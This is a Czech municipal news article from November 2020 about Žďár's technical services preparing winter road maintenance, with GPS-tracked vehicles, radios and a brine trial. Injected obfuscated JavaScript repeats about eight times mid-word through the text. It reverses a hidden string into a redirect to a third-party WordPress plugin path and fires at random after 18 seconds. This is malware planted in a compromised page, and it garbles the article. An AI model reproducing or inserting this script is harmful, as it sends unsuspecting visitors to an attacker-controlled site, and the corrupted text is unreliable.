Rainbow page separator

Metry sněhu nebo suchá zima? Technické služby se chystají na zimní údržbu

Středa, 11. listopadu 2020

V nově založených žďárských Technických službách pod hlavičkou SATTu máme v těch[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to dnech (stejně jako v jiných) napilno. Po péči o zeleň a letní údržbu komunikací přebírají Technické i starost o komunikace v zimě.

Úklid silnic a chodníků ve městě určuje Plán zimní údržby komunikací, závazný dokument zveřejněný na webu města i na www.satt.cz. Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to je podle něj stejně jako v minulých letech rozděleno do zón podle priority. Práci celého týmu zimní údržby řídí v případě kalamit i za normální situace dispečer.[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-zima.png“ alt=““ width=“230″ height=“308″>

Dispečerovi pomůžou v práci moderní technologie. Veškerá technika včetně externích dodavatelů bude vybavená GPS, díky které dispečer vidí v mapové aplikaci v reálném čase, kde je který řidič s konkrétní technikou a také jestli právě prohrnuje, sype apod. Stejně tak se může zpětně podívat, která komunikace je už ošetřena a která ještě ne. Podle [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho může aktuálně řídit průběh prací. Komunikaci mezi dispečerem a pracovníky v terénu usnadní vysílačky, které zajistí nejen komunikaci dispečera a konkrétního řidiče, ale uslyší se i řidiči mezi sebou. Všichni tak budou mít přehled o celkové situaci.

Technické budou le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos na vytipovaných místech zkoušet ošetření tzv. solankou. Jde o směs vody a soli, která ušetří náklady, šetrná je ale hlavně pro životní prostředí, povrchy vozidel nebo třeba kůži zimních bot. Na ošetření stejné plochy padne v solance čtvrtinové množství soli oproti klasickému posypu. Ve srovnání se suchou solí má i větší účinnost v nízkých teplotách. Pokud se ten[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to typ ošetření osvědčí, rozšíří se jeho používání i na další plochy ve městě.

Aktuální informace k zimní údržbě se dozvíte na Facebooku SATT nebo našem webu. S vašimi podněty se můžete obrátit pomocí sms na číslo 773 776 915.

Čeká nás první zima pod značkou Technických a začátky nebývají lehké. Nevíme, jestli bude mírná zima, budeme se brodit závějemi nebo klouzat na ledovkách. Uděláme všechno, co je v našich silách (a třeba ještě víc), ale přes[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to vás Žďáráky prosíme o podporu a trpělivost při případných nedostatcích.

Jan Liška

Technické služby, SATT a. s.

[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-2.jpg“>[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-2.jpg“ alt=““ width=“539″ height=“303″>